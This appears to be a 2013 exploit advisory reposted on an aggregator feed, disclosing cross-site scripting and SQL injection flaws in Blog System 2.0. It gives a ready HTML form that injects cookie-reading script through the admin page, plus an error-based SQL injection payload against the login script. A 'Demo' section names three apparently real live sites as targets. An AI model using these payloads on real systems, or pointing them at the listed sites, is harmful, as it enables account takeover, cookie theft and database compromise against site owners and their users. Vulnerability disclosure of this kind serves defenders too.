Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Blog System 2.0 XSS/SQLi Vulnerability

$
0
0

##########################################
# Exploit Title: Blog System 2.0 XSS/SQL Injection Vulnerability
# Date: 2013-02-27
# Author: DaOne aka Mocking Bird
# Software Link: http://www.netartmedia.net/blogsystem/
# Category: webapps/php
# Version: 2.0
##########################################

[#] Cross Site Scripting
attacker can inject javascript in [title or html] fields
PoC:
<form  action="http://site.com/BLOGSADMIN/index.php" method="post">
<input type=hidden name=category value="home">
<input type=hidden name=action value="welcome">
<input type=hidden name=SpecialProcessAddForm>
<input type=text name="title" value="<script>alert(document.cookie)</script>">
<input name="html" value="<script>alert(document.cookie)</script>">
<input type=submit value="submit"></form>


[#] SQL Injection
-Exploit-
http://site.com/BLOGSADMIN/loginaction.php
Request Data:
Email='%2B(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'&Password=123

-Demo-
http://blogsever.com/BLOGSADMIN/loginaction.php
http://www.mypublishingbook.com/BLOGSADMIN/loginaction.php
http://www.gamr15.com/BLOGSADMIN/loginaction.php


Greets to: All TGT Members..




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Viewing all articles
Browse latest Browse all 8064

Trending Articles